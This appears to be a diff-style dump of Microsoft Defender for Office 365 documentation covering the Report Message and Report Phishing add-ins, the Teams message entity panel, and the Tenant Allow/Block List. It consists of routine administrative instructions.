- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md): Membership in the **Organization Management** role group.
- - [Exchange Online permissions](/Exchange/permissions-exo/permissions-exo): Membership in the **Organization Management** role group.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator** role gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- For organizational installs, the organization needs to be configured to use OAuth authentication. For more information, see [Determine if Centralized Deployment of add-ins works for your organization](../../admin/manage/centralized-deployment-of-add-ins.md).--- The Report Message and Report Phishing add-ins work with most Microsoft 365 subscriptions and the following products:
- - Outlook on the web
- - Outlook 2013 SP1 or later
- - Outlook 2016 for Mac
- - Outlook included with Microsoft 365 apps for Enterprise
- - Outlook for iOS and Android
--- Currently, reporting messages in shared mailboxes or other mailboxes by a delegate using the add-ins isn't supported. Messages aren't sent to the [reporting mailbox](submissions-user-reported-messages-custom-mailbox.md) or to Microsoft. Built-in reporting in Outlook on the web in shared mailboxes or other mailboxes by a delegate is supported. Messages are sent to the reporting mailbox or to Microsoft.--- The add-ins aren't available for on-premises Exchange mailboxes.--- For more information on how to report a message using reporting in Outlook, see [Report false positives and false negatives in Outlook](submissions-outlook-report-messages.md).-
- > [!NOTE]
- > Reported messages are available to admins on the **User reported** tab of **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=user> **only** if both of the following settings are configured on the **User reported settings** page at <https://security.microsoft.com/securitysettings/userSubmission>:
- >
- > - **Monitor reported messages in Outlook** is selected.
- > - **Use the built-in "Report" button in Outlook** is selected.
--- If the [User reported settings](submissions-user-reported-messages-custom-mailbox.md) in the organization send user reported messages (email and [Microsoft Teams](submissions-teams.md)) to Microsoft (exclusively or in addition to the reporting mailbox), we do the same checks as when admins submit messages to Microsoft for analysis from the **Submissions** page:
- - **Email authentication check** (email messages only): Whether email authentication passed or failed when it was delivered.
- - **Policy hits**: Information about any policies or overrides that might have allowed or blocked the incoming email into the organization, thus overriding our filtering verdicts.
- - **Payload reputation/detonation**: Up-to-date examination of any URLs and attachments in the message.
- - **Grader analysis**: Review done by human graders to confirm whether or not messages are malicious.
-
- So, submitting or resubmitting messages to Microsoft is useful to admins only for messages that have never been submitted to Microsoft, or when you disagree with the original verdict.
--- Organizations that use URL filtering or a third-party security solution (for example, a proxy and/or firewall) must be able to reach the following URLs using the HTTPS protocol:
- - `ipagave.azurewebsites.net`
- - `outlook.office.com`
-
-## Admin instructions
-
-Install and configure the Report Message or Report Phishing add-ins for the organization.
-
-> [!NOTE]
-> It could take up to 12 hours for the add-in to appear in your organization.
->
-> When you follow these instructions to centrally deploy the add-ins, a corresponding app registration is also deployed in Azure. If you delete the app registration for the add-in in Azure, the add-in is also deleted from the organization.
-
-### Get the Report Message or Report Phishing add-in for your organization
-
-1. In the Microsoft 365 admin center at <https://admin.microsoft.com>, expand **Show all** if necessary, and then go to **Settings** \> **Integrated apps**. Or, to go directly to the **Integrated apps** page, use <https://admin.microsoft.com/Adminportal/Home#/Settings/IntegratedApps>.
-
-2. On the **Integrated apps** page, select :::image type="icon" source="../../media/m365-cc-sc-get-apps-icon.png" border="false"::: **Get apps**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/microsoft-365-admin-center-integrated-apps.png" alt-text="The Integrated apps page in the Microsoft 365 admin center where you select Get apps." lightbox="../../media/microsoft-365-admin-center-integrated-apps.png":::
-
-3. In the **Microsoft 365 Apps** page that opens, enter **Report Message** in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box.
-
- In the search results, select **Get it now** in the **Report Message** entry or the **Report Phishing** entry to start the **Deploy New App** wizard.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/microsoft-365-admin-center-report-message.png" alt-text="Search results for Report Message showing the Report Message and Report Phishing add-ins, and the Get it now buttons on each." lightbox="../../media/microsoft-365-admin-center-report-message.png":::
-
- > [!NOTE]
- > Although the screenshots in the remaining steps show the **Report Message** add-in, the steps are identical for the **Report Phishing** add-in.
-
-4. On the **Add users** page, configure the following settings:
-
- - **Is this a test deployment?**: Leave the toggle at :::image type="icon" source="../../media/scc-toggle-off.png" border="false"::: **No**, or set the toggle to :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: **Yes**.
-
- - **Assign users**: Select one of the following values:
- - **Just me**
- - **Entire organization**
- - **Specific users/groups**: Find and select users and groups in the search box. After each selection, the user or group appears in the **To be added** section that appears below the search box. To remove a selection, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: on the entry.
-
- - **Email notification**: By default, **Send email notification to assigned users** is selected. Select **View email sample** to open [Add-in deployment email alerts](../../admin/manage/add-in-deployment-email-alerts.md).
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/microsoft-365-admin-center-deploy-new-app-add-users.png" alt-text="The Add users page of Deploy New App." lightbox="../../media/microsoft-365-admin-center-deploy-new-app-add-users.png":::
-
- When you're finished on the **Add users** page, select **Next**.
-
-5. On the **Accept permissions requests** page, read the app permissions and capabilities information carefully before you select **Next**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/microsoft-365-admin-center-deploy-new-app-accept-permissions-requests.png" alt-text="The Accept permissions requests page of Deploy New App." lightbox="../../media/microsoft-365-admin-center-deploy-new-app-accept-permissions-requests.png":::
-
-6. On the **Review and finish deployment** page, review your settings. Select **Back** to make changes.
-
- When you're finished on the **Review and finish deployment** page, select **Finish deployment**.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/microsoft-365-admin-center-deploy-new-app-review-and-finish.png" alt-text="The Review and finish deployment page of Deploy New App." lightbox="../../media/microsoft-365-admin-center-deploy-new-app-review-and-finish.png":::
-
- A progress indicator appears on the **Review and finish deployment** page.
-
-7. On the **Deployment completed page**, you can select **view this deployment** to close the page and go to [the details of the add-in](#view-and-edit-settings-for-the-report-message-or-report-phishing-add-ins). Or, select **Done** to close the page.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/microsoft-365-admin-center-deployment-complete.png" alt-text="The notification message of the deployment completed." lightbox="../../media/microsoft-365-admin-center-deployment-complete.png":::
-
-### Get the Report Message or the Report Phishing add-ins for your Microsoft 365 GCC or GCC High organization
-
-Admins in Microsoft 365 Government Community Cloud (GCC) or GCC High need to use the steps in this section to get the Report Message or Report Phishing add-ins for their organizations. These steps apply to Outlook and Outlook on the web (formerly known as Outlook Web App or OWA) and don't apply to Outlook for iOS and Android.
-
-> [!NOTE]
-> It could take up to 24 hours for the add-in to appear in your organization.
->
-> In U.S. Government organizations (Microsoft 365 GCC, GCC High, and DoD), reported messages aren't sent to Microsoft for analysis. They're sent only to the reporting mailbox that you identify for compliance reasons (data isn't allowed to leave the organization boundary). For more information, see [User reported settings](submissions-user-reported-messages-custom-mailbox.md).
-
-1. In the Microsoft 365 admin center at <https://portal.office365.us/adminportal/home#/Settings/AddIns>, select **Settings** \> **Add-ins** \> **Deploy Add-in** \> **Upload custom apps**.
-
-2. In the **Upload custom apps** flyout that opens, select **I have a URL for the manifest file**.
-
-3. In the **Add from URL** dialog that opens, enter one of the following URLs:
- - **Report Message**: <https://ipagave.azurewebsites.net/ReportMessageManifest/ReportMessageAzure.xml>
- - **Report Phishing**: <https://ipagave.azurewebsites.net/ReportPhishingManifest/ReportPhishingAzure.xml>
-
- When you're finished, select **Install**. In the success dialog, select **OK**.
-
-4. Back on the **Add-ins** page, select the add-in you installed, and then select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit**.
-
-5. In the add-in properties dialog that opens, confirm or modify the following settings:
- - **Make this add-in available to users in your organization**.
- - **Specify user defaults**: Select one of the following settings:
- - **Optional, enabled by default**.
- - **Optional, disabled by default**.
- - **Mandatory, always enabled. Users can't disable this add-in**.
-
- When you're finished, select **Save**.
-
-6. To fully configure user reported message settings, see [User reported settings](submissions-user-reported-messages-custom-mailbox.md).
-
-### View and edit settings for the Report Message or Report Phishing add-ins
-
-1. In the Microsoft 365 admin center at <https://admin.microsoft.com>, expand **Show all** if necessary, and then go to **Settings** \> **Integrated apps**. Or, to go directly to the **Integrated apps** page, use <https://admin.microsoft.com/Adminportal/Home#/Settings/IntegratedApps>.
-
- > [!NOTE]
- > Although the screenshots in the remaining steps show the **Report Message** add-in, the steps are identical for the **Report Phishing** add-in.
-
-2. On the **Deployed apps** tab of the **Integrated apps** page, select the **Report Message** add-in or the **Report Phishing** add-in by doing one of the following steps:
-
- - In the **Name** column, select the icon or text for the add-in. This selection takes you to the **Overview** tab in the details flyout as described in the next steps.
- - In the **Name** column, select **Γï«** **Edit row**, and then select :::image type="icon" source="../../media/m365-cc-sc-add-internal-icon.png" border="false"::: **Edit users** to go to the **Users** tab in the details flyout as described in the next step.
- - In the **Name** column, select **Γï«** **Edit row**, and then select :::image type="icon" source="../../media/m365-cc-sc-show-trends-icon.png" border="false"::: **Check usage data** to go to the **Usage** tab in the details flyout as described in the next step.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/microsoft-365-admin-center-select-report-message-add-in.png" alt-text="Select the Report Message add-in on the Integrated apps page in the Microsoft 365 admin center." lightbox="../../media/microsoft-365-admin-center-select-report-message-add-in.png":::
-
-3. The details flyout that opens contains the following tabs:
-
- - **Overview** tab:
- - **Basic info** section:
- - **Status**
- - **Type**: Add-in
- - **Test deployment**: **Yes** or **No**, depending on the option you selected when you [deployed the add-in](#get-the-report-message-or-report-phishing-add-in-for-your-organization) or the selection you change on the **Users** tab.
- - **Description**
- - **Host product**: Outlook
- - **Actions** section: Select **Remove app** to remove the app.
- - **Assigned users** section: Select **Edit users** to go to the **Users** tab.
- - **Usage** section: Select **Check usage data** to got to the **Usage** tab.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/microsoft-365-admin-center-report-message-add-in-details-overview-tab.png" alt-text="The Overview tab on the details flyout of the Report Message add-in in the Microsoft 365 admin center." lightbox="../../media/microsoft-365-admin-center-report-message-add-in-details-overview-tab.png":::
-
- - **Users** tab:
- - **Is this a test deployment?**: Leave the toggle at :::image type="icon" source="../../media/scc-toggle-off.png" border="false"::: **No**, or set the toggle to :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: **Yes**.
- - **Assign users** section: Select one of the following values:
- - **Just me**
- - **Entire organization**
- - **Specific users/groups**: Find and select users and groups in the search box. After each selection, the user or group appears in the **Added users** section that appears below the search box. To remove a selection, select :::image type="icon" source="../../media/m365-cc-sc-remove-icon.png" border="false"::: on the entry.
-
- - **Email notification** section: **Send email notification to assigned users** and **View email sample** aren't selectable.
-
- If you made any updates on this tab, select **Update** to save your changes.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/microsoft-365-admin-center-report-message-add-in-details-users-tab.png" alt-text="The Users tab on the details flyout of the Report Message add-in in the Microsoft 365 admin center." lightbox="../../media/microsoft-365-admin-center-report-message-add-in-details-users-tab.png":::
-
- - **Usage** tab: The chart and details table shows the number of active users over time.
- - Filter the **Date range** to **7 days**, **30 days** (default), or **90 days**.
- - In the **Report** column, select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Download** to download the information filtered by **Date range** to the file named **UsageData.csv**.
-
- When you're finished viewing the information on the tabs, select :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: **Close** to close the details flyout.
-
-## User instructions
-
-### Get the Report Message or Report Phishing add-ins for yourself
-
-1. Do either of the following steps:
-
- - Open the Microsoft commercial marketplace at <https://appsource.microsoft.com/marketplace/apps>. On the **AppSource** page, enter **Report message** in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box, and then select the **Report Message** or **Report Phishing** in the results.
-
- :::image type="content" source="../../media/microsoft-appsource-find-report-message-add-in.png" alt-text="Search results on the Microsoft commercial marketplace page for the Report Message add-in." lightbox="../../media/microsoft-appsource-find-report-message-add-in.png":::
-
- - Use one of the following URLs to go directly to the download page for the add-in:
- - **Report Message**: <https://appsource.microsoft.com/product/office/WA104381180>
- - **Report Phishing**: <https://appsource.microsoft.com/product/office/WA200002469>
-
- > [!NOTE]
- > Although the screenshots in the remaining steps show the **Report Message** add-in, the steps are identical for the **Report Phishing** add-in.
-
-2. On the details page of the add-in, select **Get it now**.
-
- :::image type="content" source="../../media/ReportMessageGETITNOW.png" alt-text="The details page of the Report Message add-in where you select Get it now." lightbox="../../media/ReportMessageGETITNOW.png":::
-
-3. If prompted, sign in with your Microsoft account credentials.
-
-4. When the installation is finished, you get the following **Launch** page:
-
- :::image type="content" source="../../media/report-message-add-in-launch-page.png" alt-text="The Launch page of the Report Message add-in." lightbox="../../media/report-message-add-in-launch-page.png":::
-
-### Get the Report Message or the Report Phishing add-ins for yourself in Microsoft 365 GCC or GCC High
-
-Individual users in Microsoft 365 GCC or GCC High can't get the Report Message or Report Phishing add-ins using the Microsoft commercial marketplace.
-
-## Use the Report Message or the Report Phishing add-ins
-
-In supported versions of Outlook, use the Report Message or the Report Phishing add-ins to submit false positives and false negatives. For more information, see [Report false positives and false negatives in Outlook](submissions-outlook-report-messages.md).
security Teams Message Entity Panel https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/teams-message-entity-panel.md
- Title: The Teams Message Entity Panel in Microsoft Defender for Office 365----
- - MET150
- - MOE150
-
- - m365-security
- - tier1
- - highpri
-description: Describes the Teams message entity panel for Microsoft Teams in Microsoft Defender for Office 365 Plan 2, how it does post-breach work like ZAP and Safe Links and gives admins a single pane of glass on Teams chat and channel threats like suspicious URLs..
- Previously updated : 11/16/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# The Teams message entity panel in Microsoft Defender for Office 365 Plan 2
--
-Similar to the [The Email summary panel](mdo-email-entity-page.md#the-email-summary-panel) for email messages, Microsoft 365 organizations that have Microsoft Defender for Office 365 Plan 2 (add-on licenses or included in subscriptions like Microsoft 365 E5) have the _Microsoft Teams message entity panel_ in the Microsoft Defender portal. The Teams message entity panel is a details flyout includes all Microsoft Teams data about suspicious or malicious chats, channels, and group chats on a single, actionable panel.
-
-This article explains the information and actions on the Teams message entity panel.
-
-## Permissions and licensing for the Teams message entity panel
-
-To use the Email entity page, you need to be assigned permissions. You have the following options:
--- [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md): Membership in the **Global Administrator**, **Security Administrator**, or **Quarantine Administrator** role groups.-- [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership these roles gives users the required permissions _and_ permissions for other features in Microsoft 365:
- - _Full access_: Membership in the **Global Administrator** or **Security Administrator** roles.
- - _Read-only access_: Membership in the **Global Reader** or **Security Reader** roles.
-
-## Where to find the Teams message entity panel
-
-There are no direct links to the Teams message entity panel from the top levels of the Defender portal. Instead, the Teams message entity panel is available in the following locations:
--- From the **Quarantine** page at <https://security.microsoft.com/quarantine>: Select the **Teams message** tab \> select an entry by clicking anywhere in the row other than the check box. The details flyout that opens is the Teams message entity panel.--- From the **Submissions** page at <https://security.microsoft.com/reportsubmission>:
- - Select the **Teams messages** tab \> select an entry by clicking anywhere in the row other than the check box.
- - Select the **User reported** tab \> select a Teams entry by clicking anywhere in the row other than the check box. You can filter the entries by selecting :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** \> **Message type** \> **Teams**. The details flyout that opens is the Teams message entity panel.
-
-## What's on the Teams message entity panel
-
-The following information is available at the top of the Teams message entity panel:
--- The title of the flyout is the subject or the first 100 characters of the Teams message.-- The current message verdict.-- The number of links in the message.-- The actions that are available at the top of the flyout depend on where you opened the Teams message entity panel.-
-> [!TIP]
-> To see details about other Teams messages without leaving the Email summary panel of the current message, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-The next sections in the Teams message entity panel depend on where you opened it:
--- [Quarantined Teams messages](quarantine-admin-manage-messages-files.md#view-quarantined-teams-message-details)-- [View Teams admin submission details](submissions-admin.md#view-teams-admin-submission-details)-- [View user reported Teams message details in Defender for Office 365 Plan 2](submissions-admin.md#view-user-reported-teams-message-details-in-defender-for-office-365-plan-2)-
-The rest of the Teams message entity panel contains the following information, regardless of where you opened it:
--- **Message details** section:
- - **Threats**
- - **Message location**
- - **Sender address**
- - **Time received**
- - **Detection tech**
- - **Teams message ID**: You can use this value as an identifier of a Teams message in Defender for Office 365.
--- **Sender** section:
- - The sender's name and email address
- - **Domain**
- - **External**: The value **Yes** indicates the message was sent between an internal user and an external user.
--- One of the following sections, depending on whether the message if from a chat or a channel:
- - Chat: The **Participants** section:
- - **Conversation type**
- - **Chat name**
- - **Name and email**: Contains the name and email addresses of all of the participants (including the sender). If there are more than 10 participants, it also links to a secondary panel that lists all the participants in the chat at the time of the suspected threat.
- - Channel: The **Channel details** section:
- - **Conversation type**
- - **Conversation name**: Contains the name of the channel.
- - **Name and email**: Contains the name and address of the channel.
--- **URLs** section:
- - **Name and type** Contains the URL from the Teams message.
- - **Threat**
-
- If the message has more than 10 URLs, select **View all URLs** to see all of them.
--
-## For more information
-
-[The Microsoft Defender for Office 365 Email Entity Page and how it works](mdo-email-entity-page.md)
-
-[Safe Links in Microsoft Defender for Office 365](safe-links-about.md)
-
-[Zero-hour auto purge (ZAP) in Microsoft Teams](zero-hour-auto-purge.md#zero-hour-auto-purge-zap-in-microsoft-teams)
security Tenant Allow Block List About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/tenant-allow-block-list-about.md
- Title: Manage allows and blocks in the Tenant Allow/Block List
- - NOCSH
---- Previously updated : 6/20/2023-- MET150--- m365-security-- tier1-
-description: Learn how to manage allow entries and block entries in the Tenant Allow/Block List in the Security portal.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Manage allows and blocks in the Tenant Allow/Block List
--
-> [!IMPORTANT]
-> To allow phishing URLs that are part of third-party attack simulation training, use the [advanced delivery configuration](advanced-delivery-policy-configure.md) to specify the URLs. Don't use the Tenant Allow/Block List.
-
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, you might disagree with the EOP or Microsoft Defender for Office 365 filtering verdict. For example, a good message might be marked as bad (a false positive), or a bad message might be allowed through (a false negative).
-
-The Tenant Allow/Block List in the Microsoft Defender portal gives you a way to manually override the Defender for Office 365 or EOP filtering verdicts. The list is used during mail flow for incoming messages from external senders.
-
-The Tenant Allow/Block List doesn't apply to internal messages within the organization. However, block entries for **Domains and email addresses** prevent users in the organization from sending email to those blocked domains and addresses.
-
-The Tenant Allow/Block list is available in the Microsoft Defender portal at <https://security.microsoft.com> \> **Policies & rules** \> **Threat Policies** \> **Tenant Allow/Block Lists** in the **Rules** section. To go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-For usage and configuration instructions, see the following articles:
--- **Domains and email addresses** and **spoofed senders**: [Allow or block emails using the Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md)-- **Files**: [Allow or block files using the Tenant Allow/Block List](tenant-allow-block-list-files-configure.md)-- **URLs**: [Allow or block URLs using the Tenant Allow/Block List](tenant-allow-block-list-urls-configure.md).-
-These articles contain procedures in the Microsoft Defender portal and in PowerShell.
-
-## Block entries in the Tenant Allow/Block List
-
-> [!NOTE]
-> In the Tenant Allow/Block List, block entries take precedence over allow entries.
-
-Use the **Submissions** page (also known as *admin submission*) at <https://security.microsoft.com/reportsubmission> to create block entries for the following types of items as you report them as false negatives to Microsoft:
--- **Domains and email addresses**:
- - Email messages from these senders are marked as *high confidence phishing* and then moved to quarantine.
- - Users in the organization can't send email to these blocked domains and addresses. They receive the following non-delivery report (also known as an NDR or bounce message): `550 5.7.703 Your message can't be delivered because messages to XXX, YYY are blocked by your organization using Tenant Allow Block List.` The entire message is blocked for all internal and external recipients of the message, even if only one recipient email address or domain is defined in a block entry.
-
- > [!TIP]
- > To block only spam from a specific sender, add the email address or domain to the block list in [anti-spam policies](anti-spam-policies-configure.md). To block all email from the sender, use **Domains and email addresses** in the Tenant Allow/Block List.
--- **Files**: Email messages that contain these blocked files are blocked as *malware*. Messages containing the blocked files are quarantined.--- **URLs**: Email messages that contain these blocked URLs are blocked as *high confidence phishing*. Messages containing the blocked URLs are quarantined.-
-In the Tenant Allow/Block List, you can also directly create block entries for the following types of items:
--- **Domains and email addresses**, **Files**, and **URLs**.--- **Spoofed senders**: If you manually override an existing allow verdict from [spoof intelligence](anti-spoofing-spoof-intelligence.md), the blocked spoofed sender becomes a manual block entry that appears only on the **Spoofed senders** tab in the Tenant Allow/Block List.-
-By default, block entries for **domains and email addresses**, **files** and **URLs** expire after 30 days, but you can set them to expire up 90 days or to never expire. Block entries for **spoofed senders** never expire.
-
-## Allow entries in the Tenant Allow/Block List
-
-In most cases, you can't directly create allow entries in the Tenant Allow/Block List:
--- **Domains and email addresses**, **files**, and **URLs**: You can't create allow entries directly in the Tenant Allow/Block List. Instead you use the **Submissions** page at <https://security.microsoft.com/reportsubmission> to report the **email**, **email attachment**, or **URL** to Microsoft as **Should not have been blocked (False positive)**.--- **Spoofed senders**:
- - If spoof intelligence has already blocked the message as spoofing, use the **Submissions** page at <https://security.microsoft.com/reportsubmission> to report the **email** to Microsoft as **Should not have been blocked (False positive)**.
- - You can proactively create an allow entry for a spoofed sender on the **Spoofed sender** tab in the Tenant Allow/Block List before [spoof intelligence](anti-spoofing-spoof-intelligence.md) identifies and blocks the message as spoofing.
-
-The following list describes what happens in the Tenant Allow/Block List when you report something to Microsoft as a false positive on the **Submissions** page:
--- **Email attachments** and **URLs**: An allow entry is created and the entry appears on the **Files** or **URLs** tab in the Tenant Allow/Block List respectively.-
- For URLs reported as false positives, we'll allow subsequent messages that contain variations of the original URL. For example, you use the **Submissions** page to report the incorrectly blocked URL `www.contoso.com/abc`. If your organization later receives a message that contains the URL (for example but not limited to: `www.contoso.com/abc`, `www.contoso.com/abc?id=1`, `www.contoso.com/abc/def/gty/uyt?id=5`, or `www.contoso.com/abc/whatever`), the message won't be blocked based on the URL. In other words, you don't need to report multiple variations of the same URL as good to Microsoft.
--- **Email**: If a message was blocked by the EOP or Defender for Office 365 filtering stack, an allow entry might be created in the Tenant Allow/Block List:
- - If the message was blocked by [spoof intelligence](anti-spoofing-spoof-intelligence.md), an allow entry for the sender is created, and the entry appears on the **Spoofed senders** tab in the Tenant Allow/Block List.
- - If the message was blocked by [user (or graph) impersonation protection in Defender for Office 365](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365), an allow entry isn't created in the Tenant Allow/Block List. Instead, the domain or sender is added to the **Trusted senders and domains section** in the [anti-phishing policy](anti-phishing-policies-mdo-configure.md#use-the-microsoft-defender-portal-to-modify-anti-phishing-policies) that detected the message.
- - If the message was blocked due to file-based filters, an allow entry for the file is created, and the entry appears on the **Files** tab in the Tenant Allow/Block List.
- - If the message was blocked due to URL-based filters, an allow entry for the URL is created, and the entry appears on the **URL** tab in the Tenant Allow/Block List.
- - If the message was blocked for any other reason, an allow entry for the sender email address or domain is created, and the entry appears on the **Domains & addresses** tab in the Tenant Allow/Block List.
- - If the message wasn't blocked due to filtering, no allow entries are created anywhere.
-
-By default, allow entries for domains and email addresses, files, and URLs exist for 30 days. During those 30 days, Microsoft learns from the allow entries and [removes them or automatically extends them](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/automatic-tenant-allow-block-list-expiration-management-is-now/ba-p/3723447). After Microsoft learns from the removed allow entries, messages that contain those entities will be delivered, unless something else in the message is detected as malicious. By default, allow entries for spoofed senders never expire.
-
-> [!IMPORTANT]
-> Microsoft does not allow you to create allow entries directly. Unnecessary allow entries expose your organization to malicious email which could have been filtered by the system.
->
-> Microsoft manages the creation of allow entries from the **Submissions** page at <https://security.microsoft.com/reportsubmission>. Allow entries are added during mail flow based on the filters that determined the message was malicious. For example, if the sender email address and a URL in the message were determined to be bad, an allow entry is created for the sender (email address or domain) and the URL.
->
-> When the entity is encountered again (during mail flow or time of click), all filters associated with that entity are skipped.
->
-> During mail flow, if messages containing the allowed entity pass other checks in the filtering stack, the messages will be delivered. For example, if a message passes [email authentication checks](email-authentication-about.md), URL filtering, and file filtering, a message from an allowed sender email address will be delivered.
-
-## What to expect after you add an allow or block entry
-
-After you add an allow entry on the **Submissions** page or a block entry in the Tenant Allow/Block List, the entry should start working immediately (within 5 minutes).
-
-If Microsoft has learned from the allow entry, the entry is removed. You'll get an alert about the removal of the now unnecessary allow entry from the built-in [alert policy](/purview/alert-policies#threat-management-alert-policies) named **Removed an entry in Tenant Allow/Block List**.
security Tenant Allow Block List Email Spoof Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/tenant-allow-block-list-email-spoof-configure.md
- Title: Allow or block email using the Tenant Allow/Block List
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier1
-description: Admins can learn how to allow or block email and spoofed sender entries in the Tenant Allow/Block List.
- Previously updated : 11/27/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Allow or block email using the Tenant Allow/Block List
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, admins can create and manage entries for domains and email addresses (including spoofed senders) in the Tenant Allow/Block List. For more information about the Tenant Allow/Block List, see [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md).
-
-This article describes how admins can manage entries for email senders in the Microsoft Defender portal and in Exchange Online PowerShell.
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>. To go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell). To connect to standalone EOP PowerShell, see [Connect to Exchange Online Protection PowerShell](/powershell/exchange/connect-to-exchange-online-protection-powershell).--- Entry limits for domains and email addresses:
- - **Exchange Online Protection**: The maximum number of allow entries is 500, and the maximum number of block entries is 500 (1000 domain and email address entries in total).
- - **Defender for Office 365 Plan 1**: The maximum number of allow entries is 1000, and the maximum number of block entries is 1000 (2000 domain and email address entries in total).
- - **Defender for Office 365 Plan 2**: The maximum number of allow entries is 5000, and the maximum number of block entries is 10000 (15000 domain and email address entries in total).
--- For spoofed senders, the maximum number of allow entries and block entries is 1024 (1024 allow entries and no block entries, 512 allow entries and 512 block entries, etc.).--- Entries for spoofed senders never expire.--- For details about the syntax for spoofed sender entries, see the [Domain pair syntax for spoofed sender entries](#domain-pair-syntax-for-spoofed-sender-entries) section later in this article.--- An entry should be active within 5 minutes.--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Detection tuning (manage)** or **Authorization and settings/Security settings/Core security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - *Add and remove entries from the Tenant Allow/Block List*: Membership in one of the following role groups:
- - **Organization Management** or **Security Administrator** (Security admin role).
- - **Security Operator** (Tenant AllowBlockList Manager).
- - *Read-only access to the Tenant Allow/Block List*: Membership in one of the following role groups:
- - **Global Reader**
- - **Security Reader**
- - **View-Only Configuration**
- - **View-Only Organization Management**
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions *and* permissions for other features in Microsoft 365.
-
-## Domains and email addresses in the Tenant Allow/Block List
-
-### Create allow entries for domains and email addresses
-
-You can't create allow entries for domains and email addresses directly in the Tenant Allow/Block List. Unnecessary allow entries expose your organization to malicious email that would have been filtered by the system.
-
-Instead, you use the **Emails** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=email>. When you submit a blocked message as **Should not have been blocked (False positive)**, an allow entry for the sender is added to the **Domains & email addresses** tab on the **Tenant Allow/Block Lists** page. For instructions, see [Submit good email to Microsoft](submissions-admin.md#report-good-email-to-microsoft).
-
-> [!NOTE]
-> Allow entries are added based on the filters that determined the message was malicious during mail flow. For example, if the sender email address and a URL in the message were determined to be bad, an allow entry is created for the sender (email address or domain) and the URL.
->
-> When the entity in the allow entry is encountered again (during mail flow or at time of click), all filters associated with that entity are overridden.
->
